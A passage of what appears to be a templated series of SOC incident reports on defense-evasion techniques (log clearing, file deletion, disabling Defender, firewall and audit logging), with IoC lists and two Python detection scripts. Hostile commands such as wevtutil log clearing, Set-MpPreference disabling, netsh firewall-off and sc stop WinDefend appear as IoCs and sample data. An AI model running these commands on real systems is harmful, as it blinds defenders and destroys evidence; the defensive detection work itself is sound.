11:20-11:23 – Brute force attempts
11:23 – Successful login
11:24 – Log clearing
11:30 – Alert triggers
11:32 – SOC investigates
11:33 – Host isolated
11:34 – sql_service account disabled
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Account:
– sql_service (compromised)
Commands:
– wevtutil cl Security
– wevtutil cl System
– wevtutil cl "Windows PowerShell"
– wevtutil cl Application
4. Containment Actions:
Immediate Actions:
Isolated SQL-SRV-01.
Disabled sql_service account.
Reset password.
Blocked attacker IP at firewall.
Removed unauthorized “temp_sql” user.
Account Remediation:
Password policy strengthened.
MFA enforced (where possible).
Host Remediation:
Full scan (no malware found).
Verified no persistence.
5. Root Cause Analysis:
Primary Cause: Weak password on service account.
Contributing Factors:
Password exposed in script on file share.
RDP allowed from internet.
6. Business Impact:
Operational Impact: SQL server offline for 1 hour.
Data Exposure: Database schema viewed; no customer data exfiltrated.
7. Remediation & Prevention:
Completed Actions:
Logs recovered.
Account secured.
Host cleaned.
Technical Controls Enhanced:
Enforced strong password policy.
Moved RDP behind VPN only.
Enhanced monitoring for log clearing events.
8. Conclusion:
An attacker performed RDP brute force, successfully logged in using a weak service account password, and attempted to cover tracks by clearing event logs. Splunk’s forwarded logs preserved the full attack timeline. The host was isolated and the account secured.
Closure Rationale: Logs recovered; account secured; attacker blocked.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-07 12:30 EST
144. T1070.004 – File Deletion (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-FILE-DELETE-1070-7842
Alert Time: 2024-03-07 16:30:45 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Mass File Deletion – Potential Indicator Removal”
MITRE ATT&CK: T1070.004 – Indicator Removal: File Deletion
Alert Details:
Detection: Large number of files deleted from Temp and Downloads folders
Host: DEV-WS-078 (Development Workstation)
User: rpatel@company.com (Raj Patel, Engineer)
Time: 16:15-16:30 EST
File Deletion Events (CrowdStrike File Events):
16:15:22 – Deleted: C:\Users\rpatel\Downloads\malware_tool.exe
16:15:45 – Deleted: C:\Users\rpatel\Downloads\mimikatz.exe
16:16:12 – Deleted: C:\Users\rpatel\Downloads\procdump.exe
16:16:38 – Deleted: C:\Users\rpatel\AppData\Local\Temp\script.ps1
16:17:05 – Deleted: C:\Users\rpatel\AppData\Local\Temp\output.txt
16:17:33 – Deleted: C:\Users\rpatel\Desktop\scan_results.txt
16:18:01 – Deleted: C:\Windows\Temp\beacon.exe
16:18:28 – Deleted: C:\Windows\Temp\config.ini
… (total 47 files deleted)
Process Details:
Process: cmd.exe (PID: 4789)
Command: del /f /q C:\Users\rpatel\Downloads\*.exe C:\Users\rpatel\AppData\Local\Temp\*.* C:\Windows\Temp\*.* C:\Users\rpatel\Desktop\*.txt
Parent: explorer.exe
User: rpatel
Additional Context:
Files deleted include known hacking tools (mimikatz, procdump)
Also deleted script outputs and configuration files
User rpatel had previously been flagged for suspicious activity
Detection Logic:
Mass file deletion (47 files in 15 minutes)
Files deleted are forensic evidence (malware, outputs)
Deletion from multiple locations (Downloads, Temp, Desktop)
Pattern matches attacker cleaning up after activity
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed mass file deletion |
| 2. Process Investigation | Identify cmd.exe activity | CrowdStrike | User manually deleted files |
| 3. User Interview | Contact rpatel | Teams, Phone | User admitted to using “hacking tools for learning” |
| 4. Tool Analysis | Recover deleted files (if possible) | Forensics | Files overwritten, not recoverable |
| 5. User Remediation | User counseling | Manager, HR | Policy violation documented |
| 6. Account Monitoring | Enhanced monitoring for user | CrowdStrike | User flagged for future activity |
Jira Incident Report
Ticket: SOC-2024-184
Summary: T1070.004 – Mass File Deletion of Hacking Tools
Status: RESOLVED
Resolution: POLICY VIOLATION – User Remediated
Priority: P3 – LOW
Labels: T1070, file-deletion, indicator-removal, policy-violation
Components: Endpoint-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Mass File Deletion – Potential Indicator Removal”.
Host: DEV-WS-078 (Development, user rpatel).
Files Deleted: 47 files (hacking tools, outputs, configs).
Time: 2024-03-07 16:30 EST.
Technique: MITRE ATT&CK T1070.004 – Indicator Removal: File Deletion.
2. Technical Analysis:
User Activity:
User had downloaded multiple hacking tools over past week:
mimikatz.exe (credential dumper)
procdump.exe (process dumper)
various PowerShell scripts
network scanning tools
User ran tools against his own system (testing)
Generated output files (scan_results.txt, output.txt)
After finishing, user deleted all evidence
Files Deleted (47):
Downloaded executables (12) – mimikatz, procdump, etc.
PowerShell scripts (8) – enumeration scripts
Output files (15) – scan results, logs
Configuration files (5) – tool configs
Temp files (7) – various
User Intent:
User claimed “learning security for certification”
No malicious intent against company
Unauthorized use of hacking tools (policy violation)
Attempted to cover tracks by deleting evidence
Policy Violation:
Use of unauthorized hacking tools
Failure to report security testing
Attempt to conceal activities
3. Investigation Findings:
Timeline:
16:15-16:30 – File deletion
16:30 – Alert
16:32 – SOC investigates
16:35 – User interviewed
16:40 – Policy violation documented
Indicators of Compromise (IoCs):
Deleted Files:
– C:\Users\rpatel\Downloads\mimikatz.exe
– C:\Users\rpatel\Downloads\procdump.exe
– C:\Users\rpatel\AppData\Local\Temp\script.ps1
– C:\Users\rpatel\Desktop\scan_results.txt
– C:\Windows\Temp\beacon.exe
– (and 42 others)
4. Containment Actions:
Immediate Actions:
Documented policy violation.
No further action needed (user stopped).
User Remediation:
User counseled on security policy.
Required to complete security training.
Escalated to manager.
Monitoring:
Enhanced monitoring for this user.
Application control to block hacking tools.
5. Root Cause Analysis:
Primary Cause: User curiosity about security tools.
Contributing Factors:
No application control.
User unaware of policy.
6. Business Impact:
Operational Impact: None.
Data Exposure: None (user tested on own system).
7. Remediation & Prevention:
Completed Actions:
Policy violation documented.
User educated.
Technical Controls Enhanced:
Implemented application control to block hacking tools.
Enhanced monitoring for tool downloads.
8. Conclusion:
A user downloaded and used unauthorized hacking tools, then attempted to cover tracks by deleting evidence. CrowdStrike detected the mass file deletion. The user was counseled, and application control was implemented.
Closure Rationale: Policy violation addressed; user educated; controls enhanced.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-07 17:30 EST
145. T1562.001 – Disable or Modify Tools (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-DISABLE-TOOLS-1562-7842
Alert Time: 2024-03-07 10:30:22 EST
Severity: CRITICAL (96/100)
Source: Microsoft Defender for Endpoint
Rule: “Tampering with Security Tools Detected”
MITRE ATT&CK: T1562.001 – Impair Defenses: Disable or Modify Tools
Alert Details:
Detection: Attempt to disable multiple security tools on domain controller
Host: DC-01 (Primary Domain Controller)
User: SYSTEM (via compromised admin account)
Time: 10:15-10:30 EST
Commands Executed (from process creation):
Disable Windows Defender:
10:15:22 – powershell Set-MpPreference -DisableRealtimeMonitoring $true
10:15:45 – powershell Set-MpPreference -DisableBehaviorMonitoring $true
10:16:12 – powershell Set-MpPreference -DisableBlockAtFirstSeen $true
10:16:38 – powershell Set-MpPreference -DisableIOAVProtection $true
10:17:05 – powershell Add-MpPreference -ExclusionPath C:\Windows\Temp
10:17:33 – powershell Add-MpPreference -ExclusionProcess cmd.exe
Disable Windows Firewall:
10:18:01 – netsh advfirewall set allprofiles state off
Stop Security Services:
10:18:28 – sc stop WinDefend
10:18:55 – sc stop Sense (Microsoft Defender ATP)
10:19:22 – sc stop WdNisSvc (Network Inspection)
10:19:48 – sc stop MpsSvc (Firewall)
Disable Event Logging:
10:20:15 – wevtutil set-log Security /enabled:false
10:20:42 – wevtutil set-log System /enabled:false
10:21:08 – wevtutil set-log Application /enabled:false
Disable Audit Policies:
10:21:35 – auditpol /set /category:* /success:disable /failure:disable
Process Details:
Process: psexec.exe from compromised admin workstation
Source IP: 185.143.221[.]89
Account: jwilson (domain admin, compromised)
Detection Logic:
Multiple commands to disable security tools
Defender settings modified (real-time monitoring off, exclusions added)
Firewall disabled
Security services stopped
Event logging and audit policies disabled
Pattern matches attacker disabling defenses before ransomware
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify Defender alerts | Microsoft 365 Defender | Confirmed defense disablement on DC |
| 2. Immediate Action | Isolate DC-01 | CrowdStrike, Network ACLs | DC-01 quarantined |
| 3. Re-enable Defenses | Re-enable all security tools | PowerShell, Group Policy | Defender, Firewall, logging re-enabled |
| 4. Account Remediation | Disable compromised admin account | Azure AD, AD | jwilson account disabled; password reset |
| 5. Network Block | Block attacker IP | Palo Alto | 185.143.221[.]89 blocked |
| 6. Incident Response | Activate emergency response | Management, Legal | Potential ransomware prep |
Jira Incident Report
Ticket: SOC-2024-185
Summary: T1562.001 – Attacker Disables Security Tools on Domain Controller
Status: RESOLVED
Resolution: MALICIOUS – Defenses Restored
Priority: P1 – CRITICAL
Labels: T1562, disable-tools, defender-tampering, domain-controller, compromised-admin
Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Tampering with Security Tools Detected”.
Host: DC-01 (Primary Domain Controller).
Actions: Defender, Firewall, logging, audit policies disabled.
Time: 2024-03-07 10:30 EST.
Technique: MITRE ATT&CK T1562.001 – Impair Defenses: Disable or Modify Tools.
2. Technical Analysis:
Attack Chain:
09:30 – jwilson (domain admin) account compromised via phishing
09:45 – Attacker logs into admin workstation via RDP
10:00 – Attacker uses psexec to push script to DC-01
10:15-10:30 – Defense disablement commands executed
10:30 – Defender detects tampering
Defenses Disabled:
Windows Defender: Real-time monitoring off, behavior monitoring off, exclusions added (Temp, cmd.exe)
Windows Firewall: Completely disabled
Security Services: WinDefend, Sense (ATP), WdNisSvc, MpsSvc stopped
Event Logging: Security, System, Application logs disabled
Audit Policies: All success/failure auditing disabled
Attacker Intent:
Prepare for ransomware deployment
Prevent detection during encryption
Disable logging to cover tracks
Disable firewall to allow C2 communication
Compromised Admin:
jwilson (Domain Admin)
No MFA (now enforced)
3. Investigation Findings:
Timeline:
09:30 – Admin account compromised
09:45 – Attacker logs in
10:00 – Access to DC
10:15-10:30 – Defense disablement
10:30 – Alert
10:32 – SOC investigates
10:33 – DC isolated
10:34 – Defenses re-enabled
10:35 – Admin account disabled
Indicators of Compromise (IoCs):
Commands:
– Set-MpPreference -DisableRealtimeMonitoring $true
– Set-MpPreference -DisableBehaviorMonitoring $true
– Add-MpPreference -ExclusionPath C:\Windows\Temp
– netsh advfirewall set allprofiles state off
– sc stop WinDefend
– sc stop Sense
– wevtutil set-log Security /enabled:false
– auditpol /set /category:* /success:disable /failure:disable
Account:
– jwilson (compromised)
Network:
– Attacker IP: 185.143.221[.]89
4. Containment Actions:
Immediate Actions:
Isolated DC-01.
Re-enabled all Defender settings.
Restarted security services.
Re-enabled Windows Firewall.
Re-enabled event logs.
Re-enabled audit policies.
Disabled jwilson account.
Reset password.
Blocked attacker IP.
Domain-Wide Actions:
Verified no other DCs affected.
Checked for ransomware (none found).
Rotated krbtgt password (precaution).
Host Remediation:
Full scan (clean).
Verified no persistence.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to DC.
6. Business Impact:
Operational Impact: DC offline for 10 minutes (isolation and restoration).
Security Impact: Defenses down for 15 minutes; no ransomware executed.
7. Remediation & Prevention:
Completed Actions:
Defenses restored.
Admin account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Implemented Privileged Access Workstations.
Created alert for defense disablement attempts.
Enabled tamper protection in Defender.
8. Conclusion:
An attacker compromised a domain admin account and systematically disabled security defenses on the domain controller, preparing for ransomware deployment. Defender detected the tampering and enabled rapid restoration before any encryption could occur.
Closure Rationale: Defenses restored; admin account secured; ransomware prevented.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-07 11:30 EST
End of Batch 29
Batch 30: Defense Evasion & Obfuscation Incident Reports
146. T1562.002 – Disable Windows Event Logging (Splunk Detection)
Splunk Alert Details
Alert ID: SPLUNK-DISABLE-LOGGING-1562-7842
Alert Time: 2024-03-08 09:30:15 EST
Severity: CRITICAL (95/100)
Source: Splunk Enterprise Security
Rule: “Windows Event Logging Disabled – Defense Evasion”
MITRE ATT&CK: T1562.002 – Impair Defenses: Disable Windows Event Logging
Alert Details:
Correlated Events:
Windows Event ID 1102 (Security Log Cleared) – Not present because logging disabled first
Event ID 104 (System Log Cleared) – Not present
Event ID 4719 (Audit Policy Change):
Time: 09:20:22 EST
Host: DC-01 (Domain Controller)
User: SYSTEM (via script)
Changes: “Audit Policy Change: Success Removed, Failure Removed” for multiple categories
Event ID 4904 (Audit Log Removed):
Time: 09:21:15 EST
Host: DC-01
Description: “An attempt to remove the audit log was made.”
Process Creation (Event ID 4688):
Time: 09:18:45 EST
Process: wevtutil.exe
Command: wevtutil set-log Security /enabled:false /retention:false /maxsize:1
Command: wevtutil set-log System /enabled:false
Command: wevtutil set-log Application /enabled:false
Command: wevtutil set-log "Windows PowerShell" /enabled:false
Additional Commands:
09:19:10 – auditpol /set /subcategory:"Security State Change" /success:disable /failure:disable
09:19:30 – auditpol /set /subcategory:"Other System Events" /success:disable /failure:disable
09:19:50 – auditpol /set /subcategory:"Logon" /success:disable /failure:disable
Detection Logic:
Event logs disabled via wevtutil (critical defense evasion)
Audit policies disabled via auditpol
No subsequent log events from the host (logging off)
Pattern matches attacker preparing to operate without detection
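The Detection Logic in report 145 (Defender settings, firewall, service stops, event logging, audit policy) and the wevtutil/auditpol logic above describe the same class of signal: process-creation command lines that turn a defence off, several of them from one actor in a short window. The block below is an added example serving both reports, not code from either report or from Defender or Splunk: it classifies command lines into those categories and alerts only when an actor hits more than one category within fifteen minutes, so a lone exclusion added during a change window does not fire. Field names are assumptions; the sample events are constructed from report 145's command timeline.

```python
# Added example (not code from the original reports): score process-creation
# command lines (Event ID 4688 / Sysmon Event ID 1) against the defence
# impairment commands listed in reports 145 and 146, and alert when one actor
# hits several distinct categories inside a window. Sample events are
# constructed from report 145's command timeline.
import re
from datetime import datetime, timedelta

# category -> pattern over the full command line
TAMPER_PATTERNS = {
    "defender_config": re.compile(
        r"Set-MpPreference\s+-Disable\w+\s+\$true|Add-MpPreference\s+-Exclusion\w+", re.I),
    "firewall_off": re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
    "service_stop": re.compile(r"\bsc(?:\.exe)?\s+stop\s+(?:WinDefend|Sense|WdNisSvc|MpsSvc)\b", re.I),
    "eventlog_off": re.compile(r"wevtutil(?:\.exe)?\s+(?:sl|set-log)\s+.*?/e(?:nabled)?:false", re.I),
    "audit_off": re.compile(r"auditpol(?:\.exe)?\s+/set\s+.*?/(?:success|failure):disable", re.I),
}


def classify_command(cmdline):
    """Return the tampering category a command line falls into, or None."""
    for category, pattern in TAMPER_PATTERNS.items():
        if pattern.search(cmdline):
            return category
    return None


def tampering_alerts(events, window=timedelta(minutes=15), min_categories=2):
    """events: dicts with time, host, user, cmdline. Returns
    {(host, user): sorted categories} for actors that hit at least
    `min_categories` distinct categories inside `window`. A single category
    (one exclusion during a change window) is a low-confidence signal; several
    together is the pattern both reports describe."""
    hits = {}
    for ev in events:
        cat = classify_command(ev["cmdline"])
        if cat:
            hits.setdefault((ev["host"], ev["user"]), []).append(
                (datetime.fromisoformat(ev["time"]), cat))
    alerts = {}
    for actor, seq in hits.items():
        seq.sort()
        for i in range(len(seq)):
            run = {c for t, c in seq[i:] if t - seq[i][0] <= window}
            if len(run) >= min_categories:
                alerts[actor] = sorted(run)
                break
    return alerts


def _ev(host, user, time, cmdline):
    return {"host": host, "user": user, "time": time, "cmdline": cmdline}

SAMPLE_EVENTS = [
    _ev("DC-01", "jwilson", "2024-03-07T10:15:22", "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    _ev("DC-01", "jwilson", "2024-03-07T10:17:05", r"powershell Add-MpPreference -ExclusionPath C:\Windows\Temp"),
    _ev("DC-01", "jwilson", "2024-03-07T10:18:01", "netsh advfirewall set allprofiles state off"),
    _ev("DC-01", "jwilson", "2024-03-07T10:18:28", "sc stop WinDefend"),
    _ev("DC-01", "jwilson", "2024-03-07T10:20:15", "wevtutil set-log Security /enabled:false"),
    _ev("DC-01", "jwilson", "2024-03-07T10:21:35", "auditpol /set /category:* /success:disable /failure:disable"),
    # Control: one exclusion added by an administrator, followed by a harmless query
    _ev("APP-01", "opsadmin", "2024-03-07T10:00:00", r"powershell Add-MpPreference -ExclusionPath D:\SQLData"),
    _ev("APP-01", "opsadmin", "2024-03-07T10:01:00", "sc query MSSQLSERVER"),
]

if __name__ == "__main__":
    for (host, user), cats in tampering_alerts(SAMPLE_EVENTS).items():
        print(f"{host} {user}: {', '.join(cats)}")
```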
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify Splunk correlation | Splunk ES | Confirmed event logging disabled on DC-01 |
| 2. Process Investigation | Identify source of commands | CrowdStrike Falcon | PsExec from compromised admin workstation |
| 3. Immediate Action | Isolate DC-01 | CrowdStrike, Network ACLs | DC-01 quarantined |
| 4. Re-enable Logging | Enable event logs and audit policies | wevtutil, auditpol | All logs re-enabled |
| 5. Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
| 6. Network Block | Block attacker IP | Palo Alto | 185.143.221[.]89 blocked |
Jira Incident Report
Ticket: SOC-2024-186
Summary: T1562.002 – Windows Event Logging Disabled on Domain Controller
Status: RESOLVED
Resolution: MALICIOUS – Logging Restored
Priority: P1 – CRITICAL
Labels: T1562, disable-logging, wevtutil, auditpol, domain-controller
Components: Log-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security.
Alert: “Windows Event Logging Disabled – Defense Evasion”.
Host: DC-01 (Primary Domain Controller).
Actions: Security, System, Application, PowerShell logs disabled; audit policies disabled.
Time: 2024-03-08 09:30 EST.
Technique: MITRE ATT&CK T1562.002 – Impair Defenses: Disable Windows Event Logging.
2. Technical Analysis:
Attack Chain:
08:30 – Admin account (bjones) compromised via phishing
08:45 – Attacker logs into admin workstation via RDP
09:00 – Attacker uses PsExec to push commands to DC-01
09:18-09:21 – Event logging disabled
09:21 – No further logs generated
09:30 – Splunk alert (based on audit policy changes and process creation)
Logging Disabled:
wevtutil commands: Disabled Security, System, Application, PowerShell logs
auditpol commands: Disabled auditing for critical categories (Logon, Security State Change, etc.)
Result: No events recorded after 09:21
Attacker Intent:
Operate without leaving traces
Prepare for ransomware or data theft
Prevent detection of further actions
Compromised Admin:
bjones (Domain Admin)
No MFA (now enforced)
3. Investigation Findings:
Timeline:
08:30 – Admin account compromised
08:45 – Attacker logs in
09:00 – PsExec to DC
09:18-09:21 – Logging disabled
09:30 – Alert
09:32 – SOC investigates
09:33 – DC isolated
09:34 – Logging re-enabled
Indicators of Compromise (IoCs):
Commands:
– wevtutil set-log Security /enabled:false
– wevtutil set-log System /enabled:false
– wevtutil set-log Application /enabled:false
– wevtutil set-log "Windows PowerShell" /enabled:false
– auditpol /set /subcategory:"Logon" /success:disable /failure:disable
– (similar for other subcategories)
Account:
– bjones (compromised)
4. Containment Actions:
Immediate Actions:
Isolated DC-01.
Re-enabled all event logs via wevtutil.
Re-enabled audit policies via auditpol.
Restarted Windows Event Log service.
Disabled bjones account.
Reset password.
Blocked attacker IP.
Verification:
Confirmed logs are being written again.
Reviewed available logs for attacker activity (none after disable).
Host Remediation:
Full scan (clean).
Verified no persistence.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to DC.
6. Business Impact:
Operational Impact: DC offline for 15 minutes.
Forensic Impact: Gap in logs from 09:21 to 09:34 (13 minutes).
7. Remediation & Prevention:
Completed Actions:
Logging restored.
Account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Created alert for wevtutil and auditpol usage.
Enabled advanced audit policies to log changes to logging settings.
8. Conclusion:
An attacker compromised a domain admin account and disabled event logging and audit policies on the domain controller, creating a blind spot. Splunk detected the configuration changes and enabled rapid restoration, limiting the logging gap to 13 minutes.
Closure Rationale: Logging restored; account secured; attacker blocked.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-08 10:30 EST
147. T1562.004 – Disable or Modify System Firewall (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-DISABLE-FIREWALL-1562-7842
Alert Time: 2024-03-08 14:15:33 EST
Severity: CRITICAL (96/100)
Source: Palo Alto Networks Firewall + Cortex XDR
Rule: “Windows Firewall Disabled – Potential Defense Evasion”
MITRE ATT&CK: T1562.004 – Impair Defenses: Disable or Modify System Firewall
Alert Details:
Detection: Windows Firewall disabled on multiple critical servers
Affected Hosts:
SQL-SRV-01 (SQL Server)
WEB-SRV-01 (Web Server)
FILESRV-01 (File Server)
DC-01 (Domain Controller)
Time: 14:00-14:15 EST
Events (from Cortex XDR):
Host: SQL-SRV-01
14:05:22 – Command: netsh advfirewall set allprofiles state off
14:05:25 – Registry: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall set to 0
14:05:28 – Service: MpsSvc (Windows Firewall) stopped
Host: WEB-SRV-01
14:07:45 – Command: netsh advfirewall set allprofiles state off
14:07:48 – Registry modified
14:07:50 – Service stopped
Host: FILESRV-01
14:10:12 – Same pattern
Host: DC-01
14:12:38 – Same pattern
Source of Commands:
All commands originated from compromised admin workstation (192.168.45.78)
Using PsExec to execute on each server
Attacker IP (external): 185.143.221[.]89 (connected to admin workstation)
Detection Logic:
Windows Firewall disabled on multiple critical servers
Pattern matches attacker preparing for lateral movement or ransomware
A disabled firewall allows unrestricted C2 communication
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Palo Alto/Cortex alerts | Cortex XDR | Confirmed firewall disabled on 4 servers |
| 2. Immediate Action | Isolate compromised admin workstation | CrowdStrike | Admin workstation quarantined |
| 3. Re-enable Firewall | Enable firewall on all affected servers | PowerShell (Invoke-Command) | Firewall re-enabled on all 4 servers |
| 4. Account Remediation | Disable compromised admin account | Azure AD, AD | Admin account disabled; password reset |
| 5. Network Block | Block attacker IP | Palo Alto | 185.143.221[.]89 blocked |
| 6. Verification | Confirm firewall status | PowerShell | All firewalls enabled and active |
Jira Incident Report
Ticket: SOC-2024-187
Summary: T1562.004 – Windows Firewall Disabled on 4 Critical Servers
Status: RESOLVED
Resolution: MALICIOUS – Firewall Restored
Priority: P1 – CRITICAL
Labels: T1562, disable-firewall, netsh, defense-evasion, compromised-admin
Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Cortex XDR.
Alert: “Windows Firewall Disabled – Potential Defense Evasion”.
Hosts: SQL-SRV-01, WEB-SRV-01, FILESRV-01, DC-01.
Action: Windows Firewall disabled via netsh.
Time: 2024-03-08 14:15 EST.
Technique: MITRE ATT&CK T1562.004 – Impair Defenses: Disable or Modify System Firewall.
2. Technical Analysis:
Attack Chain:
13:30 – Admin account (kwilson) compromised via phishing
13:45 – Attacker logs into admin workstation via RDP
13:50 – Attacker enumerates critical servers
14:00-14:15 – Uses PsExec to disable firewall on each server
14:15 – Cortex XDR detects
Firewall Disablement:
Command: netsh advfirewall set allprofiles state off
Registry: HKLM\…\EnableFirewall set to 0
Service: MpsSvc stopped
Result: All inbound/outbound traffic allowed
Attacker Intent:
Allow unrestricted C2 communication
Enable lateral movement without restrictions
Prepare for ransomware deployment
Compromised Admin:
kwilson (Domain Admin)
No MFA (now enforced)
3. Investigation Findings:
Timeline:
13:30 – Admin account compromised
13:45 – Attacker logs in
13:50 – Server enumeration
14:00-14:15 – Firewall disablement
14:15 – Alert
14:17 – SOC investigates
14:18 – Admin workstation isolated
14:19 – Firewall re-enabled on all servers
Indicators of Compromise (IoCs):
Commands:
– netsh advfirewall set allprofiles state off
– sc stop MpsSvc
Registry:
– HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = 0
Account:
– kwilson (compromised)
4. Containment Actions:
Immediate Actions:
Isolated compromised admin workstation.
Re-enabled firewall on all 4 servers using PowerShell (Invoke-Command).
Restarted MpsSvc service.
Verified firewall status.
Disabled kwilson account.
Reset password.
Blocked attacker IP.
Verification:
Confirmed firewall active on all servers.
No persistent changes found.
Host Remediation:
Full scan on admin workstation (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to critical servers.
6. Business Impact:
Operational Impact: Servers exposed for ~15 minutes.
Data Exposure: No evidence of data theft.
7. Remediation & Prevention:
Completed Actions:
Firewall restored.
Account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Created alert for firewall disablement.
Implemented change management for firewall rules.
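The detection logic in the two T1562 reports above (wevtutil/auditpol on DC-01, then netsh/MpsSvc fanned out to four servers from one workstation) can be expressed as a small rule set plus a per-source fan-out correlation. The following is an added example and not the SOC's Splunk or Cortex content; the events are constructed from the command lines and times in the reports, and the source host name ADMIN-WS-01 is an assumption for the sample only.

```python
"""T1562.002 / T1562.004 detection over constructed process-creation events.

Added example, not code from the original reports. Sample events mirror the
recorded command lines; ADMIN-WS-01 (originating workstation) is assumed.
"""
import re
from datetime import datetime, timedelta

# (technique, description, pattern over the recorded command line).
# wevtutil accepts "sl" for set-log and "/e" for /enabled, so both spellings match.
RULES = [
    ("T1562.002", "event log channel disabled via wevtutil",
     re.compile(r"\bwevtutil(\.exe)?\s+(sl|set-log)\b.*/e(nabled)?:false", re.I)),
    ("T1562.002", "audit subcategory disabled via auditpol",
     re.compile(r"\bauditpol(\.exe)?\s+/set\b.*/(success|failure):disable", re.I)),
    ("T1562.004", "host firewall profile disabled via netsh",
     re.compile(r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I)),
    ("T1562.004", "Windows Firewall service (MpsSvc) stopped",
     re.compile(r"\b(sc|net)(\.exe)?\s+stop\s+MpsSvc\b", re.I)),
]

# Constructed sample: 4688-style records already normalised to dicts.
SAMPLE_EVENTS = [
    {"time": "2024-03-08 09:10:00", "host": "DC-01", "source": "ADMIN-WS-01",
     "command": "wevtutil qe Security /c:5 /rd:true /f:text"},   # benign query, for contrast
    {"time": "2024-03-08 09:18:45", "host": "DC-01", "source": "ADMIN-WS-01",
     "command": "wevtutil set-log Security /enabled:false /retention:false /maxsize:1"},
    {"time": "2024-03-08 09:18:46", "host": "DC-01", "source": "ADMIN-WS-01",
     "command": 'wevtutil set-log "Windows PowerShell" /enabled:false'},
    {"time": "2024-03-08 09:19:50", "host": "DC-01", "source": "ADMIN-WS-01",
     "command": 'auditpol /set /subcategory:"Logon" /success:disable /failure:disable'},
    {"time": "2024-03-08 14:05:22", "host": "SQL-SRV-01", "source": "ADMIN-WS-01",
     "command": "netsh advfirewall set allprofiles state off"},
    {"time": "2024-03-08 14:07:45", "host": "WEB-SRV-01", "source": "ADMIN-WS-01",
     "command": "netsh advfirewall set allprofiles state off"},
    {"time": "2024-03-08 14:10:12", "host": "FILESRV-01", "source": "ADMIN-WS-01",
     "command": "netsh advfirewall set allprofiles state off"},
    {"time": "2024-03-08 14:12:38", "host": "DC-01", "source": "ADMIN-WS-01",
     "command": "netsh advfirewall set allprofiles state off"},
    {"time": "2024-03-08 14:12:40", "host": "DC-01", "source": "ADMIN-WS-01",
     "command": "sc stop MpsSvc"},
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def match_rules(command):
    """All (technique, description) pairs whose pattern matches the command line."""
    return [(t, d) for t, d, rx in RULES if rx.search(command)]


def silent_after(events, host, start, minutes=10):
    """True when the host produced no event in the `minutes` after `start`:
    the 'no subsequent log events from the host' condition in the report."""
    t0 = parse_ts(start)
    t1 = t0 + timedelta(minutes=minutes)
    return not any(e["host"] == host and t0 < parse_ts(e["time"]) <= t1 for e in events)


def detect(events, fanout_threshold=3, window_minutes=30):
    """Return per-event hits and any source that hit >= threshold distinct hosts
    inside one window (the PsExec fan-out seen in the firewall incident)."""
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        for technique, desc in match_rules(ev["command"]):
            hit = dict(ev, technique=technique, description=desc)
            if technique == "T1562.002":
                hit["silent_after"] = silent_after(events, ev["host"], ev["time"])
            hits.append(hit)

    fanout, by_source = [], {}
    for h in hits:
        by_source.setdefault(h["source"], []).append(h)   # hits stay time-ordered
    for src, src_hits in by_source.items():
        for i, first in enumerate(src_hits):
            end = parse_ts(first["time"]) + timedelta(minutes=window_minutes)
            targets = {h["host"] for h in src_hits[i:] if parse_ts(h["time"]) <= end}
            if len(targets) >= fanout_threshold:
                fanout.append({"source": src, "start": first["time"], "hosts": sorted(targets)})
                break
    return {"hits": hits, "fanout": fanout}


if __name__ == "__main__":
    result = detect(SAMPLE_EVENTS)
    for h in result["hits"]:
        print(h["time"], h["host"], h["technique"], h["description"], h.get("silent_after", ""))
    print("fan-out:", result["fanout"])
```

The silence check only applies to the logging rules, because a host that has just had its Security log disabled is expected to go quiet, whereas a host with its firewall off keeps logging. The fan-out threshold and window are tuning knobs; three hosts in thirty minutes from one admin workstation is low enough to catch the incident above without firing on a single scripted change.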
8. Conclusion:
An attacker compromised an admin account and disabled Windows Firewall on four critical servers to pave the way for further attacks. Cortex XDR detected the changes, enabling rapid restoration. No data was exfiltrated.
